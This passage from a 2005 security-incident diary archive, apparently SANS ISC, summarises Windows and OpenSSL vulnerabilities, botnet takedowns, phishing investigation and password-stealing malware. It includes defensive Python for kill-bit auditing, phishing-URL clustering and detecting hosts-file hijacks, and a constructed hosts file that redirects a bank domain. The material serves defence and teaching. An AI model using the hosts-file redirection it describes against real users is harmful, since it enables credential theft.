The Transaction Internet Protocol ('TIP') is used by MSDTC (see MS05-051-A) to interface with other transaction managers. The particular vulnerability discussed here is a denial of service vulnerability which will cause TIP to cease responding if a specially crafted message is received.

Additional information about this vulnerability has been published by iDefense, available at http://www.idefense.com/application/poi/display?id=320




Published: 2005-10-11

MS05-045: Network connection Manager DoS

KB: 905414
CVE: CAN-2005-2307

The Network Connection Manager is used to manage different network connections (e.g. LAN, dial-up, ...). A specially crafted packet sent to a connection can cause the Network Connection Manager to die. However, it will restart once a new request is received.

Not much of a vulnerability. It requires an already authenticated (=connected) user and the impact appears to be minimal. The latest versions of Windows are not vulnerable (XP-SP2, Win2k3 SP1). However, older and still popular versions are (like XP-SP1, Win2k3 pre-SP1, Win2k).

Firewall best practices can be used to mitigate the issue.



Published: 2005-10-11

MS05-047 Vulnerability in PnP Could Allow Remote Code Execution

KB: 905749
CVE: CAN-2005-2120

This patch addresses a remote code execution and local elevation of privilege vulnerability in Plug and Play.  This vulnerability is similar to the one addressed by MS05-039; however, it requires the attacker to have valid logon credentials to exploit the flaw.  For those that have not patched for MS05-039 under Windows 2000, this issue could be exploited remotely by anonymous users.  On Windows XP SP2 computers, the attacker must be able to log on locally in addition to having valid administrator logon credentials.  This patch replaces MS05-039, which was released in August, of Zotob worm fame.

The standard practice of blocking ports 139 and 445 TCP will help slow exploitation of this. Just remember that the road warriors who are connected to less firewalled locations can potentially bring any such activity inside your organization.

Microsoft rates this vulnerability as Important severity as it does require valid logon credentials to attack a host.  Knowing that many corporations and academic organizations use a common password for the local administrator or other accounts on desktop computers, it is not inconceivable to me that this could be more critical than it first looks.  Any passwords that were compromised with MS05-039 (or any other patches in the past year) could be used to satisfy the need for local credentials on 2000 and XP systems prior to exploitation.  If all compromises of hosts in the past year or so resulted in all related passwords across the domain being changed, then this will be mostly a non-event.  If old passwords are still in use, then botnets or other malware will widely exploit this one in due time.



Published: 2005-10-11

MS05-050 Vulnerability in DirectShow

KB: 904706
CVE: CAN-2005-2128

DirectShow is part of DirectX. This component is used to display audio and video streams. DirectX is able to do so very fast and efficiently by taking advantage of hardware-specific acceleration.

In order to trigger this vulnerability, a user has to open a malicious .avi video file. If opened, the file may execute arbitrary code. This vulnerability is not able to escalate privileges by itself, so whatever damage is done will be limited to files the user running DirectShow has access to.

Malicious .avi files would likely be delivered as an instant message link, a URL on a web site or they may be attached to an e-mail message.

Standard "safe computing" practices will help mitigate this vulnerability. For example, do not log in as "Administrator" for day to day work and avoid accessing untrusted web sites. However, these steps are not perfect and patching is highly recommended.

In some cases, in particular on servers, you may be able to do without DirectX. Let us know if you have a recipe on how to disable DirectX.



Published: 2005-10-11

MS05-048 CDO Object Remote Code Execution


KB: 901017 (Windows 2000 SP4, Windows XP SP1/SP2, Windows Server 2003)
CVE: CAN-2005-1987

Collaboration Data Objects (CDO) allow Windows systems to send email through SMTP or a Microsoft Exchange server.  An unchecked buffer in the CDO functions for Windows 2000 and later systems (CDOSYS) and in Microsoft Exchange servers (CDOEX) allows an attacker to compromise the target host.  In order to trigger this vulnerability, an attacker has to deliver a specially crafted mail message via SMTP which is processed by the event sink handling subsystem, designed for granular processing of CDO messages.

The mitigating circumstance for this vulnerability is that the IIS 5.0 and Exchange 2000 SMTP services do not use event sinks by default.  The IIS 6.0 SMTP service does use event sinks and is therefore vulnerable, but IIS 6 does not install the SMTP service by default.  There is some confusion in the Microsoft bulletin about Exchange 2003, as it is listed both as "not vulnerable" and in the "affected software" section of the bulletin.

The challenge in determining whether your IIS SMTP service or Exchange 2000 system is vulnerable is that it depends on whether or not you are using event sinks on that system.  Third-party software such as spam gateways or anti-virus systems may install event sinks to process email messages, making systems running these products vulnerable to this flaw.

The workaround is to disable event sinks, which may not be an option for your third-party AV or SPAM filtering software.  Customers should apply the patches to resolve this flaw at the earliest opportunity.



Published: 2005-10-11

MS05-052 Cumulative Security Update for Internet Explorer (896688)

Microsoft has released Microsoft Security Bulletin MS05-052 and reports the "Impact of Vulnerability: Remote Code Execution", "Maximum Severity Rating: Critical" and their "Recommendation: Customers should apply the update immediately.".

Once again, watch this one carefully, because part of this cumulative update does nothing more than set "the kill bit for the affected Class Identifiers (CLSID) in these COM objects.", and the list of kill bits MS is setting keeps growing.
If your environment cannot accept the kill bits in this "Cumulative" update, then you are effectively prevented from receiving the other portions of the update, including "improvements to the Internet Explorer Pop-up Blocker" and "improvements to the Internet Explorer Add-on Manager." MS also mentions that the "Cumulative" Security Update "includes a kill bit for the ADODB.Stream object. This kill bit was released previously, but not as part of a security update. For more information about the ADODB.Stream object, see Microsoft Knowledge Base Article 870669. The Class Identifier (CLSID) for this object is 00000566-0000-0010-8000-00AA006D2EA4."
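For readers who want to see what a kill bit actually is, here is an added example in Python (it is not code from the diary or from Microsoft). It relies on the documented location of the kill bit (Microsoft KB 240797): bit 0x400 of the DWORD value "Compatibility Flags" under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}. The ADODB.Stream CLSID is the one quoted in the bulletin; the second CLSID in the constructed registry snapshot is hypothetical, and the snapshot exists only so the audit can run on a non-Windows host (on Windows the default reader queries the live registry).

```python
"""Audit IE ActiveX kill bits. Added example; not code from the ISC diary or Microsoft."""
import re

# Kill bit as documented in Microsoft KB 240797: bit 0x400 of "Compatibility Flags".
KILL_BIT = 0x00000400
COMPAT_KEY = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
_CLSID_RE = re.compile(
    r"^\{?([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?$")


def normalise_clsid(clsid):
    """Accept a CLSID with or without braces, any case; return the {UPPER-CASE} form."""
    match = _CLSID_RE.match(clsid.strip())
    if not match:
        raise ValueError(f"not a CLSID: {clsid!r}")
    return "{" + match.group(1).upper() + "}"


def clsid_key_path(clsid):
    """Registry subkey (under HKLM) holding the Compatibility Flags for this CLSID."""
    return COMPAT_KEY + "\\" + normalise_clsid(clsid)


def kill_bit_set(compat_flags):
    """True when the 0x400 kill bit is present in a Compatibility Flags DWORD."""
    return compat_flags is not None and (compat_flags & KILL_BIT) == KILL_BIT


def read_compat_flags(clsid):
    """Read Compatibility Flags from the live registry (Windows only); None if absent."""
    try:
        import winreg  # only exists on Windows
    except ImportError:
        return None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, clsid_key_path(clsid)) as key:
            value, kind = winreg.QueryValueEx(key, "Compatibility Flags")
    except OSError:
        return None
    return value if kind == winreg.REG_DWORD else None


def audit_kill_bits(clsids, reader=read_compat_flags):
    """Map each CLSID to True (killed), False (entry present, bit clear) or None (no entry)."""
    report = {}
    for clsid in clsids:
        flags = reader(clsid)
        report[normalise_clsid(clsid)] = None if flags is None else kill_bit_set(flags)
    return report


# Constructed registry snapshot so the audit can be exercised off Windows.
# ADODB.Stream's CLSID is real (quoted in the bulletin); the other one is hypothetical.
SAMPLE_SNAPSHOT = {
    "{00000566-0000-0010-8000-00AA006D2EA4}": 0x00000400,  # ADODB.Stream, killed
    "{11111111-2222-3333-4444-555555555555}": 0x00000000,  # entry exists, not killed
}


def snapshot_reader(clsid):
    return SAMPLE_SNAPSHOT.get(normalise_clsid(clsid))


if __name__ == "__main__":
    wanted = ["00000566-0000-0010-8000-00aa006d2ea4",
              "{11111111-2222-3333-4444-555555555555}",
              "{22222222-2222-3333-4444-555555555555}"]
    labels = {True: "killed", False: "NOT killed", None: "no entry"}
    for clsid, state in audit_kill_bits(wanted, reader=snapshot_reader).items():
        print(clsid, labels[state])
```

Point the audit at the CLSIDs from a bulletin and the "no entry" and "NOT killed" results are the controls a host can still instantiate.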

CVE CAN-2005-2127

Previous commentary on kill bits - Open letter from the handlers

Affected Software:
• Microsoft Windows 2000 Service Pack 4
• Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service Pack 2
• Microsoft Windows XP Professional x64 Edition
• Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
• Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with Service Pack 1 for Itanium-based Systems
• Microsoft Windows Server 2003 x64 Edition
• Microsoft Windows 98, Microsoft Windows 98 Second Edition (SE), and Microsoft Windows Millennium Edition (ME)

A portion of this "Cumulative" update replaces MS05-037 and MS05-038.


Published: 2005-10-11

SSL 2.0 Rollback in OpenSSL

New versions of OpenSSL have been released today (0.9.7h and 0.9.8a) to address a potential cryptographic weakness.  In servers that have enabled SSL_OP_ALL for compatibility reasons, the session is vulnerable to a potential rollback to SSL 2.0, even in the presence of SSL 3.0 and TLS 1.0, due to the implied SSL_OP_MSIE_SSLV2_RSA_PADDING setting.  Note that SSL 2.0 suffers from several cryptographic vulnerabilities, including allowing an attacker to manipulate the encrypted contents of packets without the possibility of being detected.

This can be solved by either disabling SSL 2.0 entirely on either endpoint, or by upgrading the server software to one of the new OpenSSL versions.

For more information, see:  http://www.openssl.org/news/secadv_20051011.txt


Published: 2005-10-11

CA iGateway debug mode HTTP GET request buffer overflow vulnerability/exploit

Computer Associates has an announcement concerning an "iGateway debug mode HTTP GET request buffer overflow vulnerability" that says "Remote attackers can execute arbitrary code." Exploit code is publicly available. There is no patch available at this moment; the recommended workaround is "do not run iGateway in debug mode." The Computer Associates announcement references CA iGateway 3.0 and CA iGateway 4.0.


Published: 2005-10-10

Large botnet in the Netherlands taken down

A large botnet in the Netherlands, with over 100,000 infected hosts, was taken down three days ago by a cooperative effort of several CERTs.  The National High Tech Crime Centre (NHTCC), GOVCERT.NL and the Computer Emergency Response Team of the Dutch government worked together to take down this W32.Toxbot-driven network.

For more information.....



Published: 2005-10-10

User questions new WindowsUpdate Fix

One of our readers submitted a question which I'd like to pass on to all. Back in September Microsoft posted an issue with its update, which we covered in our diary


For which Microsoft then submitted


So, today being a somewhat slow day, we were wondering if there are any readers who had problems with WindowsUpdate, and subsequently applied the listed patch?  What were the results?


Published: 2005-10-10

Happy turkey day

Happy Canadian Thanksgiving!




Published: 2005-10-09

What I'm reading today

Another thing I like to do when I have a quiet shift is to mention the security book I'm reading and see if any of you have other suggestions.  Just this afternoon, I finally started reading one of the books that has been sitting on my desk for a couple of months, but that I just hadn't gotten to.  This one is File System Forensic Analysis (ISBN 0-321-26817-2) by Brian Carrier (of TASK/Sleuthkit and Autopsy fame).  I had the privilege of meeting Brian at a SANS conference when he was still a grad student, just after he released the first version of TCTUTILS, though I'm sure he won't remember me.  So far, it looks like it will be an excellent addition to the other forensic books on my bookshelf.  I'll let you know for sure during my next shift.

Jim Clausing, jclausing /at/ isc.sans.org, also see http://handlers.sans.org/jclausing/


Published: 2005-10-09

DHCP OS Fingerprinting

Since it was another pretty quiet day, I was looking back through some old notes to see if I could come up with some diary material.  I read this article in SysAdmin magazine in February.  It got me thinking about how we track/manage the machines on our networks.  Especially the user machines.  The project at Kansas looks pretty interesting, but I was wondering if any of you, our loyal readers, had any experience with this or other similar tools and would be willing to share your experiences.  Send your experiences to me and I'll summarize the responses in my next diary (right now, I'm signed up for 9 Nov) and on my handler page.

Jim Clausing, jclausing /at/ isc.sans.org


Published: 2005-10-09

More on hunting rogue access points

If you haven't read Kevin Liston's story from Friday on his adventures hunting down rogue access points, please go read it.  I have to mention one other resource: if it comes to your area, check out the SANS Stay Sharp Program: Defeating Rogue Access Points class.  I had the opportunity to teach it in June and it does an excellent job of covering the fundamentals of how to track down these rogues in your environment.

Jim Clausing, jclausing/at/isc.sans.org  and http://handlers.sans.org/jclausing/


Published: 2005-10-08

Slow day

At the risk of jinxing it, this has been a slow day.  There were some excellent diary entries yesterday by Kevin Liston.  So I'll just encourage everyone to read those.


Published: 2005-10-07

Fingerprinting Phishers

Over the past couple of months, the number of phishing attacks targeting my client's customers has increased tremendously.  They began to ask me: "why us?"

I haven't answered that question yet, there are still a number of theories, and very little evidence to sort.  But I have made some progress in addressing the "who is attacking us?" question.

First, there is the bait-message.  This is the email that is sent out with the hopes of finding appropriate targets.  Each of these can be investigated as a spam campaign.  They have their spam relays, they have their target list, they have their subset of subject messages, and they may or may not have a permutation of body.

I think it's possible that the people managing the spam campaign are separate from those managing the actual phishing attack.  It's possible that separate phishing groups could employ a single spamming outfit.  That's just a theory at the moment.

Secondly, there is the hook-site.  This is where the link in the bait-message initially takes the victim.  The hook-site may also be the collection-site, but it could forward the victim on to a separate collection server.  This technique is especially common in cases where a phisher has a network of collection sites.

Use of a network of sites is an identifying quality of a phisher.  I argue that, given a set of phishing attacks, one can partition them to identify certain habits or modus operandi of the criminal actor.  This actor may be an individual or a group.

There are two main ways that I use to build these partitions or clusters.  You can compare how the hook-site or collection-site is built.  By collecting copies of the phishing sites during your investigation and keeping them on hand, an investigator can go back and identify "repeat offenders."  By comparing the fake website to the target firm's original site, you can examine any changes that the criminal applied.  You could also approximately date when the site was copied, if you have a suitable change-control process on your web content.

Clusters and habits can also be detected in the URL used for the hook-site.  How the criminal compromises, purchases, or otherwise acquires the hosting space can be evident in this URL.  Are they creating suspiciously long domain names (implying they control the DNS), or are they using dotted directories in an attempt to hide the space from visual detection?  Are the sites hosted out of cgi-bin space, or in directories of a BBS application?  All of these qualities can be used to cluster a number of attacks into a smaller set of attackers.

Clustering along where a hook- or collection- site is hosted can sometimes illuminate a pattern; I did not find this to be the case in this population of URLs.  I did find some interesting correspondences in the registrar used for some of the domains.  This appeared to be indicative of an issue in the registrar's validation policies.

In an attempt to automate the detection and classification, I wrote some routines that calculate the "lexical distances" between the URLs used in the attacks.  Then we built clusters based on arbitrary thresholds on these distances to see if the system was any better at classifying similar attacks than the humans.  Needless to say, the trained human analyst will outperform my pathetic Perl script any day of the week, but they did find it helpful.  Which is what it's all about.
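As an added illustration of the lexical-distance clustering described above (written in Python for this page; it is not the author's Perl script, and the hook-site URLs are constructed on documentation addresses and example domains), the routine below computes a normalised edit distance between the paths of two URLs, extracts the hosting habits mentioned earlier (long hostnames, dotted directories, cgi-bin space, BBS application directories) as a feature signature, and joins URLs into single-linkage clusters when the signatures match and the distance falls under a threshold. The 40-character hostname threshold and the list of BBS directory markers are assumptions, not values from the diary.

```python
"""Cluster phishing hook-site URLs by lexical distance and hosting habits.
Added example; not the diary author's Perl script. Sample URLs are constructed."""
from urllib.parse import urlsplit

# Directory names typical of bulletin-board software on a compromised host (assumption).
BBS_MARKERS = ("phpbb", "forum", "vbulletin", "board")


def levenshtein(a, b):
    """Classic edit distance using a single rolling row."""
    if len(a) < len(b):
        a, b = b, a
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def _split(url):
    return urlsplit(url if "://" in url else "http://" + url)


def _path(url):
    parts = _split(url)
    return parts.path + ("?" + parts.query if parts.query else "")


def lexical_distance(url_a, url_b):
    """Normalised edit distance (0..1) between the path+query parts of two URLs.
    The path is what the phisher installs; the host changes with every compromise."""
    pa, pb = _path(url_a), _path(url_b)
    longest = max(len(pa), len(pb)) or 1
    return levenshtein(pa, pb) / longest


def url_features(url):
    """Hosting habits visible in the URL itself, as listed in the diary."""
    parts = _split(url)
    host = (parts.hostname or "").lower()
    segments = [s for s in parts.path.split("/") if s]
    lowered = parts.path.lower()
    return {
        "long_host": len(host) > 40,                       # threshold is an assumption
        "dotted_dir": any(s.startswith(".") for s in segments[:-1]),
        "cgi_bin": "cgi-bin" in segments,
        "bbs_app": any(marker in lowered for marker in BBS_MARKERS),
    }


def cluster_urls(urls, threshold=0.25):
    """Single-linkage clustering: two URLs join when their feature signatures match and
    their lexical distance is <= threshold. Returns sorted lists of URL indices."""
    parent = list(range(len(urls)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    signatures = [tuple(sorted(url_features(u).items())) for u in urls]
    for i in range(len(urls)):
        for j in range(i + 1, len(urls)):
            if signatures[i] == signatures[j] and lexical_distance(urls[i], urls[j]) <= threshold:
                parent[find(i)] = find(j)
    groups = {}
    for i in range(len(urls)):
        groups.setdefault(find(i), []).append(i)
    return sorted(sorted(g) for g in groups.values())


# Constructed sample of hook-site URLs (documentation/test-net addresses only).
SAMPLE_URLS = [
    "http://198.51.100.7/cgi-bin/.bank/login.htm",
    "http://203.0.113.9/cgi-bin/.bank/login.htm",
    "http://host.example/cgi-bin/.bnk/login.htm",
    "http://www.examplebank.com.secure-login.verify-account.example.net/index.php",
    "http://www.examplebank.com.secure-update.confirm-account.example.org/index.php",
    "http://forum.example.com/phpBB2/images/update/index.html",
]

if __name__ == "__main__":
    for group in cluster_urls(SAMPLE_URLS):
        print("cluster:", [SAMPLE_URLS[i] for i in group])
```

The feature signature is what keeps generic paths such as /index.php from gluing unrelated attacks together; without it, path distance alone would merge every phisher who drops a file of that name, which is one reason the human analyst still wins.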

Sadly, identifying clusters and forming a behavioral fingerprint of a criminal is a long way from identifying said criminal.

kliston -AT- isc sans org


Published: 2005-10-07

Adventures in Hunting Rogue Wireless Access Points

This week I had the opportunity to hunt down some rogue WAPs at a client's campus.  It was a very target-rich environment.  Out of the 62 talkers that I spotted on the hunt, 39 were not part of the main, accepted infrastructure.  Out of these 39, we were looking for only one.  Not quite a needle-in-a-haystack problem, but more like a something-under-a-desk-in-a-sea-of-cubicles problem.

The Playing Field
The search area consisted of an extremely large low-rise facility with cubicles reminiscent of poultry factory farming.

The Players
Myself, with my trusty combat-laptop running Debian and Kismet 2005.04.R1 with an Orinoco Gold PCMCIA card, and an external directional antenna.


The engineer who designed the wireless infrastructure with his Windows XP laptop, Cisco Aironet card, and AiroPeek from WildPackets.

Well, it was more of a team effort.

The Strategy
Based on the results that we were seeing from the Engineer's WLSE (http://www.cisco.com/en/US/products/sw/cscowork/ps3915/) interface we knew that two of his WAPs could see the target, and we knew approximately where these WAPs were installed.

He went with the backpack, carry-the-laptop-around method, while I appropriated a cart to wheel around.

We went down to the area and wandering ensued.  Eventually, Kismet detected the beacon packets.  The best way to use Kismet in hunting a single WAP is to bring up the details (the 'i' key in this version) and keep an eye on the power rating.  The 14 dBi gain antenna wasn't as much use in this environment as I had hoped it would be.  It did help in determining whether we were on the right floor, and which WAP it was most likely close to.  It got us into the general area.  Eventually you get too close to the transmitter for the antenna to be helpful.

Attenuation is Your Friend
As you get closer to the transmitter, the signal is hot enough that you can't see the subtle changes in intensity to help guide you in the correct direction efficiently.  You need to "knock the signal down" a bit so that it fits better on your meter, so that you can read the changes.

My first step was to pull out the directional antenna.  In what turned out to be good luck, the only cart available to me was a high-walled metal cart used to transport hanging files.  This held my laptop and its PCMCIA card in the bottom of a metal box, so it was shielded from the signal rather well.

Once I was in the right area, I would effectively worm my way around the cubes until I spotted the blinky box that we were after.

My initial plan to solve the rogue access point problem was to buy some prizes and have a few "Fox and Hound" contests on the weekend where some of the appropriately-minded employees could "compete."  I still like that plan, but any time that you have people looking through cubes, you have to operate in teams so they can both keep-an-eye-on and vouch-for each other.

For more information on general transmitter hunting, I recommend Moell and Curlee's Transmitter Hunting: Radio Direction Finding Simplified.  Although their focus is on a different frequency range, the general concepts apply.

kliston -AT- isc sans org


Published: 2005-10-07

Request for packets 50032

Take a gander at this graph of activity on port 50032.  If you have a sensor that has seen any conversations on this port, we'd like to see some of the packets.

If you have only logs, please submit them directly to dshield.org for processing.  It is the packets that we are interested in.


kliston -AT- isc sans org


Published: 2005-10-07

Bluetooth Followup Links

Last Saturday I posted a bit more about my adventures in Bluetooth scanning.  I left out a link that I had intended to include, and a few more interesting links were sent in by readers.

I failed to provide a link to btscanner by Pentest in the UK.  I did not use it in my tests, but I've heard good things about it.

Other interesting links that were sent to me:


and something interesting from Slashdot:

kliston -AT- isc sans org


Published: 2005-10-07

Open-source Newsbits

I don't want to compete with Slashdot, but two announcements were made yesterday that impact the open-source security tool market.

Tenable announced yesterday that Nessus 3 will be closed-source: http://news.com.com/Nessus+security+tool+closes+its+source/2100-7344_3-5890093.html?tag=nefd.hed

Checkpoint announced the purchase of Sourcefire, but promises to keep Snort open-source: http://www.checkpoint.com/sourcefire/index.html

kliston -AT- isc sans org


Published: 2005-10-07

Microsoft October Security Bulletin Advanced Notification

Microsoft released their advanced notification (advanced as in time, not skill requirement) yesterday promising a release of nine security bulletins next Tuesday.  The highest rating is projected to be "critical," and there will be reboots required.

I can't wait.

kliston -AT- isc sans org


Published: 2005-10-06

Battle of the ISP's

If you are a Cogent or Level 3 customer, you may be experiencing some problems with your surfing experience today.  It seems that the two have decided to play the "I am better than you" game at the expense of their customers.
According to Hardware Geeks, this is preventing web pages hosted on one network from being accessed by the other's customers.




It looks like these "boys" need a timeout.  Go to opposite corners and take a deep breath. (Isn't that what we tell the children when they start fighting.)

It will definitely be interesting to watch this one play out.


Published: 2005-10-06

Two New Sober Viruses on the Loose Today

It never fails: somehow, whenever I am the Handler On Duty, another little Smurf pops out of the closet.  Today's little Smurf is Sober.R or Sober.Q or Worm_Sober.AC or ...., well, you get the drift.  (What's in a name anyway?)  However, I am pleased to say that the official CME has been released for this little fella'. Nothing to report there yet; it says Not Currently Available.  You'll have to keep checking back to see what the update brings.


We do however believe that we are working with at least two different versions.

FSecure has an interesting write up on this and is calling the second one a Dropper.  Take a look at the info in F-Secures writeup.


Our malware team is looking at the code as we speak.  It appears that this one is picky about who is blessed to receive a copy.  It appears to be a self-mailer.  Our malware team is hard at work attempting to identify and evaluate this thing and will update us as soon as possible.

It looks like the attachment name may have changed as well.  The one that I just received had the attachment name


and appears to be according to the subject my "Registration Confirmation".  

The program is packed with some pretty nasty stuff.  It looks like it may scan the hard drive to see what additional mischief it can create.  It appears to create a file services.exe and sets itself up to run in the registry.

We will keep you updated on any additional info that we get on this.


Published: 2005-10-06

Sober Virus (CME-151)

There are reports on a new variant of Sober going around the net. Different antivirus vendors name it differently. But thanks to CME effort, it is identified as CME-151.

This variant randomly uses different email messages in either German or English. We have received several reports from our readers. One reader submitted the email message below:

Danke für Ihre Mail ....
Sie haben aber Ihre Mail wahrscheinlich falsch adressiert,,, nämlich an mich. Ich kenne sie aber nicht!
Oder Ihr Provider hat die Mail falsch weiter geleitet!?
Um mich zu entlasten, schicke ich Ihnen das (...) Foto wieder zurück.

(In English: "Thanks for your mail .... But you probably addressed your mail wrongly,,, namely to me. I don't know you! Or your provider forwarded the mail incorrectly!? To clear myself, I am sending the (...) photo back to you.")

This virus arrives with one of the following attachment names:
* KlassenFoto.zip
* pword_change.zip

Inside the ZIP archive is a file named PW_Klass.Pic.packed-bitmap.exe.

You can check out more details from various antivirus vendors website:


Published: 2005-10-05

Pwstealers - evolution

While reading Mike's great story in yesterday's diary, I thought I would post this little story about my observations of password stealers, also known as pwstealers.

I have been watching this kind of malware for some time. I don't have exact numbers, but I am pretty sure that Brazil is one of the most targeted countries for this kind of scam...

I currently can distinguish four kinds of the pwstealers:

    - The keyloggers/screenloggers
    - The fake bank windows
    - Fake Bank webservers
    - The downloaders

The keyloggers/screenloggers detect the bank URLs, then try to capture as much information as possible and send it to an email address. I once found a compromised machine hosting hundreds of directories, one per victim machine, each containing hundreds of small screenshots taken as the user clicked, so the attacker could recover his/her passwords...

The fake bank windows are a funny one... whenever the malware detects the bank URLs, it calls IE with a fake website of the bank you typed. :) The funny part was that, not rarely, the fake websites were outdated and had some strange graphics... The user was supposed to fill in all the fields, and then the window would close with an (also fake) error message... :)

The fake bank webservers are quite interesting. This malware installs a webserver on the machine and changes the hosts file to redirect a specific bank domain to localhost, which is serving a copy of the bank's homepage, right? :)

The fourth one is quite obvious, and sometimes even I am not sure I would put it in the same category (pwstealers). But I include it because these downloaders are specific to pwstealers: they usually contact a free hosting site and download one of the three kinds above...!
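The hosts-file trick used by the fake bank webservers is easy to check for, so here is an added Python example (not from the diary) that parses a hosts file and flags two things: any name other than a localhost alias that is pinned to a loopback address, which is the "local fake webserver" pattern, and any watched bank domain pinned to an address at all, which bypasses DNS regardless of where it points. The hosts content and the bank domain are constructed; on Windows the file to read is %SystemRoot%\System32\drivers\etc\hosts.

```python
"""Spot hosts-file hijacks of the kind used by 'fake bank webserver' pwstealers.
Added example; not from the ISC diary. Sample hosts content and bank names are constructed."""
import ipaddress

# Names that legitimately map to loopback; anything else pointing at loopback is suspect.
LOOPBACK_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Return [(ip, [names]), ...] for each effective line; comments and blanks skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line; a stricter checker might flag it instead
        entries.append((ip, [n.lower().rstrip(".") for n in fields[1:]]))
    return entries


def find_hijacks(text, watched_domains):
    """Return findings as (kind, name, ip).
    'loopback' : a non-localhost name pinned to 127/8 or ::1 (local fake server).
    'override' : a watched bank domain (or subdomain) pinned to any address, bypassing DNS."""
    watched = tuple(d.lower().lstrip(".") for d in watched_domains)
    findings = []
    for ip, names in parse_hosts(text):
        for name in names:
            is_watched = any(name == d or name.endswith("." + d) for d in watched)
            if ip.is_loopback and name not in LOOPBACK_NAMES:
                findings.append(("loopback", name, str(ip)))
            elif is_watched:
                findings.append(("override", name, str(ip)))
    return findings


# Constructed hosts file: legitimate loopback aliases, one harmless pin, two hijacks.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
::1             ip6-localhost
127.0.0.1       www.examplebank.com          # -> local fake bank webserver
203.0.113.5     online.examplebank.com       # -> attacker-controlled copy
198.51.100.20   updates.example.net
"""

if __name__ == "__main__":
    # Real Windows location: %SystemRoot%\System32\drivers\etc\hosts
    for kind, name, ip in find_hijacks(SAMPLE_HOSTS, ["examplebank.com"]):
        print(f"{kind:8s} {name} -> {ip}")
```

The loopback check catches the variant described here even if you have no list of bank domains; the watched-domain check is what you add once you know which brands the stealer in front of you targets.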

Another thing I am observing is that they are changing the way the code is packed... recently they have been switching to more powerful kinds of packers, which are more difficult to reverse...

Well...that's it!

Ah, if you are following my malware analysis quiz, I posted the results of the first one last Friday and have already put up the new one, for which answers should be sent no later than Oct 15. :) I hope that you are having as much fun as I am! :) I am already getting some really great answers!

signing off...
Handler on Duty: Pedro Bueno - pbueno $$ ( isc. sans. org )


Published: 2005-10-05

CME was officially launched

Some days ago, our handler Donald Smith wrote about how "US-CERT, the U.S. Computer Emergency Readiness Team, will begin issuing uniform names for computer viruses, worms and other malicious code next month, as part of a program called the Common Malware Enumeration initiative."

Today US-CERT and MITRE released the CME, the Common Malware Enumeration, in a document called "Common Malware Enumeration Initiative Now Available". As it is supported by a board of anti-virus vendors, I believe that this initiative is really great and hope that it will be adopted by all the vendors as well, so we could also have more accurate numbers about virus variants.

This initiative seeks (according to the document) to:
  • Reduce the public's confusion in referencing threats during malware incidents
  • Enhance communication between anti-virus vendors
  • Improve communication and information sharing between anti-virus vendors and the rest of the information security community
Handler on Duty: Pedro Bueno - pbueno $ ( isc . sans. org)


Published: 2005-10-05

Big Business surrounding Internet Fraud

In yesterday's diary, William Salusky posted information about his battle (and beef) with a very well organized Mitglieder proxynet.  One of our avid readers asked: "How big is the Internet fraud business, and how organized is it?"

I highly recommend reading Spam Kings ( http://www.oreilly.com/catalog/spamkings/ ) on the specific topic of how the Spam business works.  On the other hand, we have marginal businesses and organized crime participating in the electronic boom as well.

DDoS for Hire:  These are the hired guns of the internet.  They will offer to knock competitors off the internet for a sum of money.  The most famous of these cases revolves around Jay Echouafni, who was the CEO of TV retailer Orbit Communications.  He paid a group of underground computer criminals to DoS his competitors offline.  The series of outages cost an estimated $2 million dollars in damages.  There is a great read on this at Security Focus ( http://www.securityfocus.com/news/9411 )

DDoS for Ransom: This is the online version of an extortion racket.  I've seen this up close and personal when clients receive an email requesting that payment be made or they will be knocked off the Internet.  One of the most famous cases here was of an online casino based out of Costa Rica.  When they were first contacted, the sum of money being requested seemed reasonable to the site owner.  He paid it.  Never, ever, ever, ever, ever... give in to these people.  First he paid approximately $500 for protection.  The following week, the request was a tad higher... $40K.  The site owner requested help from the Costa Rican police, from the FBI and from other law enforcement agencies.  He did not receive the help (perhaps the feds did not like the idea of offshore gaming).  He finally enlisted the help of a security consultant who analyzed the data and traced the attacks back to an RCM (Russian Cyber Mafia, for those in the know).

Phishing Phraud:  No, don't worry, I'm not going to go on a long tirade of words with PH's.  We are all familiar with this field of online crime.  Jacomo Piccollini, from the Brazilian Research Network, gave a fantastic talk at a conference I recently attended.  His topic was the Brazilian underground.  One of the points he made was that Brazilian web defacement groups (of which Brazil happens to be world champion) were being hired by phishing groups to host the phishing support sites on the defaced web servers.  Some of the programmers working for the BCM (yes, Brazilian Cyber Mafia) were making $3K a month.  The sad point here is that 4 of these programmers ended up dead last year, execution style.

The internet has reinvented business as we know it, both for good and evil.  I would like to extend a big thank you to all the Internet Storm Center readers that submit information to us, and continue to battle evil one bit at a time.

Mike Poor    mike   at    intelguardians   d0t  com
Handler on Duty


Published: 2005-10-05

Symantec Antivirus Scan Engine: Web Service Administrative Interface Buffer Overflow

iDEFENSE Labs has notified Symantec about a remotely exploitable buffer overflow vulnerability in the Symantec AntiVirus Scan Engine that can allow remote attackers to execute arbitrary code. The iDEFENSE Advisory says "A remote attacker can send a specially crafted HTTP request to the administrative Scan Engine Web Service on port 8004 to crash the service or execute arbitrary code."

Patch today folks.

Symantec's Advisory (with patch and mitigation information) states the "Risk Impact" is High. Affected versions listed are:

Product                                                        Version  Build  Solution
Symantec AntiVirus Scan Engine                                 4.0      All    SAVSE 4.3.12
Symantec AntiVirus Scan Engine                                 4.3      All    SAVSE 4.3.12
